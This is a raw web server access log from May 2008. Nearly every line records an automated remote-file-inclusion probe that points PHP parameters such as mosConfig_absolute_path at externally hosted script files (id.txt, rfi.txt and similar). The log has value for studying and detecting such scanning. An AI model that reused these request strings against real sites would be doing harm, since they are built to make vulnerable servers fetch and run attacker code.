207.44.212.95 - - [03/May/2008:12:30:12 -0700] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:12 -0700] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:18 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:18 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:24 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:24 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:26 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:27 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:30 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:30 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:35 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:35 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:35 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:30:35 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:30:41 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:30:41 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:30:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:30:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:30:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:30:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:12:30:44 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:12:30:44 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:30:51 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:30:51 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:31:22 -0700] "GET /logs/access_080215.log/administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:31:45 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:32:02 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.233.89.217 - - [03/May/2008:12:32:26 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [03/May/2008:12:32:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [03/May/2008:12:32:26 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:32:48 -0700] "GET /logs/access_080207.log/scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:32:48 -0700] "GET /scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:32:48 -0700] "GET /logs/scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:32:53 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:32:53 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:32:54 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:33:20 -0700] "GET /logs/access_080205.log/scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:33:56 -0700] "GET /scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [03/May/2008:12:34:21 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:34:27 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:34:27 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:34:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:12:34:31 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:12:34:31 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:12:34:33 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:12:34:33 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:34:34 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:34:53 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:34:53 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:34:53 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:12:34:55 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:12:34:55 -0700] "GET //include.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:12:34:56 -0700] "GET /logs//include.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:35:31 -0700] "GET /logs/scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:35:31 -0700] "GET /scanhttp://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.215.101.21 - - [03/May/2008:12:35:38 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lupuss.us/rfi.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; Synapse)" "www.dmulk.com"
89.108.66.156 - - [03/May/2008:12:36:10 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.156 - - [03/May/2008:12:36:10 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.198.133 - - [03/May/2008:12:36:17 -0700] "GET /logs/index.php?x=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.198.133 - - [03/May/2008:12:36:21 -0700] "GET /index.php?x=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:12:36:46 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:12:36:46 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:12:36:52 -0700] "GET /logs/nav.php?pag=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:12:36:52 -0700] "GET /nav.php?pag=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.3 - - [03/May/2008:12:36:59 -0700] "GET /calendar/include.php?path[docroot]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.70.125.187 - - [03/May/2008:12:37:03 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:37:06 -0700] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:37:06 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:37:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [03/May/2008:12:37:22 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:12:38:00 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:38:13 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:38:21 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:38:22 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [03/May/2008:12:38:24 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:38:28 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:38:28 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:38:28 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:38:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:38:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:38:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:38:29 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:38:30 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:38:47 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.70.125.187 - - [03/May/2008:12:39:08 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:12:39:16 -0700] "GET /logs/access_080215.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.236 - - [03/May/2008:12:39:22 -0700] "GET /megumi/Necklace/?M=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.242.98.48 - - [03/May/2008:12:39:29 -0700] "GET /logs/browse.php/header.php?prefix=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:12:39:55 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:12:39:59 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:12:39:59 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:12:40:02 -0700] "GET /logs/port.php?content=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:12:40:03 -0700] "GET /port.php?content=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.197.2 - - [03/May/2008:12:40:55 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [03/May/2008:12:40:55 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.44.68 - - [03/May/2008:12:41:00 -0700] "GET /logs/errors.php?error=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [03/May/2008:12:41:00 -0700] "GET /errors.php?error=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.89.198.133 - - [03/May/2008:12:41:24 -0700] "GET /logs/index.php?x=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.198.133 - - [03/May/2008:12:41:26 -0700] "GET /index.php?x=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:10 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:10 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:10 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:10 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:10 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:10 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:12 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:12 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:42:28 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.82.115.21 - - [03/May/2008:12:42:38 -0700] "GET /logs/access_080227.log//include.php?path[docroot]=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:12:42:57 -0700] "GET /logs/port.php?content=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:12:42:58 -0700] "GET /port.php?content=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:43:58 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:43:58 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:43:58 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:43:58 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:43:58 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
